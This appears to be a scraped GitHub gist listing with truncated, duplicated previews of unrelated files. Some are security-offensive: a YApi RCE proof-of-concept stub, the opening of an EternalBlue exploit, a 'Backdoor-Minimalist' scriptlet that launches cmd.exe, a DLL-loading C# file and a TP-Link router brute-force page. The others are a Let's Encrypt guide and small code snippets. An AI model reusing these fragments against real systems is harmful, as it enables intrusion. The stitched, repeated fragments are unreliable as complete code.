Canis Majoris akamajoris

## YApi-RCE.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                akamajoris
                / YApi-RCE.md
            
            
              Created
              July 16, 2021 22:12
                — forked from pikpikcu/YApi-RCE.md
            
              
                YApi-RCE
              
          
    POC YApi RCE:

Reference:


YMFE/yapi#2229

POC

Requests:
POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0


## letsencrypt_2017.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                akamajoris
                / letsencrypt_2017.md
            
            
              Created
              August 23, 2017 15:37
                — forked from cecilemuller/letsencrypt_2020.md
            
              
                How to setup Let's Encrypt for Nginx on Ubuntu 16.04 (including IPv6, HTTP/2 and A+ SLL rating)
              
          
    How to setup Let's Encrypt for Nginx on Ubuntu 16.04 (including IPv6, HTTP/2 and A+ SLL rating)

There are two main modes to run the Let's Encrypt client (called Certbot):

Standalone: replaces the webserver to respond to ACME challenges
Webroot: needs your webserver to serve challenges from a known folder.

Webroot is better because it doesn't need to replace Nginx (to bind to port 80).
In the following, we're setting up mydomain.com.
HTML is served from /var/www/mydomain, and challenges are served from /var/www/letsencrypt.

  
## main.go
package main

import (
	"fmt"
	"github.com/gorilla/mux"
	"github.com/gorilla/securecookie"
	"net/http"
)

// cookie handling

## eternalblue8_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

## gist:a459e1b1adb09d0061e0efe77e176751
/*
Copyright (c) 2016, Nitin Gode
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
    * Redistributions of source code must retain the above copyright
      notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright
      notice, this list of conditions and the following disclaimer in the

## RemoteDLLGuest.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;


/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='

## wordpress.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                akamajoris
                / wordpress.md
            
            
              Created
              May 12, 2016 07:58
                — forked from cure53/wordpress.md
            
              
                WordPress Flash XSS in flashmediaelement.swf
              
          
    WordPress Flash XSS in flashmediaelement.swf


Intro
Background
Affected Systems
Mitigation

Quick Overview


## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

## gist:3ac7377a3a1e0ce4abda
    morseAlphabet ={
        "A" : ".-",
        "B" : "-...",
        "C" : "-.-.",
        "D" : "-..",
        "E" : ".",
        "F" : "..-.",
        "G" : "--.",
        "H" : "....",
        "I" : "..",

## jsbrute
<!DOCTYPE html>
<html>

	<head>
		<meta charset="utf-8">
		<title>Bruteforce!</title>
	</head>
	<!-- http://www.tp-link.com/resources/simulator/TL-WR750N_V5.0/localiztion/str_menu.js -->
	<body onload="detectFirefox()">
		<h1>Bruteforcing TP-Link routers with JavaScript</h1>
	package main

	import (
	"fmt"
	"github.com/gorilla/mux"
	"github.com/gorilla/securecookie"
	"net/http"
	)

	// cookie handling
	#!/usr/bin/python
	from impacket import smb
	from struct import pack
	import os
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)
	/*
	Copyright (c) 2016, Nitin Gode
	All rights reserved.

	Redistribution and use in source and binary forms, with or without
	modification, are permitted provided that the following conditions are met:
	* Redistributions of source code must retain the above copyright
	notice, this list of conditions and the following disclaimer.
	* Redistributions in binary form must reproduce the above copyright
	notice, this list of conditions and the following disclaimer in the
	using System;
	using System.EnterpriseServices;
	using System.Runtime.InteropServices;


	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	Create Your Strong Name Key -> key.snk
	$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Empire"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	morseAlphabet ={
	"A" : ".-",
	"B" : "-...",
	"C" : "-.-.",
	"D" : "-..",
	"E" : ".",
	"F" : "..-.",
	"G" : "--.",
	"H" : "....",
	"I" : "..",
	<!DOCTYPE html>
	<html>

	<head>
	<meta charset="utf-8">
	<title>Bruteforce!</title>
	</head>
	<!-- http://www.tp-link.com/resources/simulator/TL-WR750N_V5.0/localiztion/str_menu.js -->
	<body onload="detectFirefox()">
	<h1>Bruteforcing TP-Link routers with JavaScript</h1>